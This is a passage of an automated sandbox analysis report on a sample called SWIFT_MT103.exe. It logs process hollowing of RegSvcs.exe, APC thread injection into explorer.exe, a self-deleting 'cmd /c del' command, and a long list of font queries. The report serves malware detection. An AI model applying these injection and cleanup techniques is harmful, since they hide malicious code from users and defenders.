          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 180000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D45008
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: explorer.exe, 0000000E.00000000.334414262.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 0000000E.00000000.335285067.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000E.00000000.318408129.0000000006860000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000E.00000000.335285067.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000E.00000000.335285067.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Users\user\Desktop\SWIFT_MT103.exe VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
